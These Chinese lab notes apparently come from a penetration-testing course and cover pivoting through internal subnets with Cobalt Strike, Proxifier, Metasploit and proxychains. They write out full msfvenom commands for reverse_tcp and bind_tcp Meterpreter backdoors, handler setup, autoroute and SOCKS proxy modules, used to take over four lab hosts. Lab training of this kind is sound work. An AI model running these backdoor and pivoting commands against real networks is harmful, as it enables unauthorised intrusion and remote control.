CV小迪的拓扑图
本次实验的知识点
0、解决网络通信问题
1、熟悉cs,msf工具的使用
2、如何建立socks代理
3、正向反向连接
CS&Proxifier操作
环节一
1、连接cs
2、生成并上传反向连接的后门
3、建立SOCKS代理
利用工具连接代理
socks4a 没有用户和密码的代理
socks5 有用户和密码的代理
端口填cs上建立的端口
目标主机填写访问什么IP时用到这个代理
应用程序就是使用什么应用程序时启动这个代理
火狐代理插件
建立代理但是没有启用时
建立代理并启用时在物理机上访问目标内网的网站
并且可以使用本地fscan工具进行扫描
环节2
接着上线192.168.2.22IP的主机
新增监听器
这个生成的木马作用是监听本地4444端口
生成正向木马,用来正向连接,正向上线
查看没有运行木马前端口的开放情况
运行后的结果
connect 192.168.2.22 4444 利用第一台拿下的主机去正向连接192.168.2.22这台内网主机
重复之前的步骤创建socks代理
最终拿下四台主机的权限,并且可以建立通讯
MSF&proxychains4操作命令:
配置反向上线:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.139.147 LPORT=3333 -f exe -o msf.exe
生成反向连接到192.168.139.147 3333端口的exe后门
use exploit/multi/handler
使用模块
set payload windows/meterpreter/reverse_tcp
设置payload
set lhost 0.0.0.0
set lport 3333
run
查看路由表:
run autoroute -p
run post/multi/manage/autoroute
创建socks节点:
background
auxiliary/server/socks_proxy
配置IP,端口,版本
配置正向上线:
msfvenom -p windows/meterpreter/bind_tcp LPORT=1234 -f exe -o z.exe
生成一个正向后门
use exploit/multi/handler
set payload windows/meterpreter/bind_tcp
set rhost xx.xx.xx.xx
set lport 6666
run
86 use exploit/multi/handler
87 set payload windows/meterpreter/reverse_tcp
88 set lport 3333
89 set lhost 0.0.0.0
90 run
设置反向模块,反向连接等待
91 sessions 1
92 use auxiliary/server/socks_proxy
93 show options
94 set srvport 4545
95 run
设置socks代理,本地4545端口
96 use exploit/multi/handler
97 set payload windows/meterpreter/bind_tcp
98 set rhost 192.168.2.22
99 set lport 1234
100 run
设置正向模块,正向连接主动连接
101 sessions list
配置socks代理
kali种自带
在/etc底下搜索
只需要更改这里
配置好后可以访问2网段的内容
生成正向木马
msfvenom -p windows/meterpreter/bind_tcp LPORT=1234 -f exe -o z.exe
配置正向模块
在192.168.2.22IP主机上运行后门
上线
上线后继续配置socks代理
最终拿下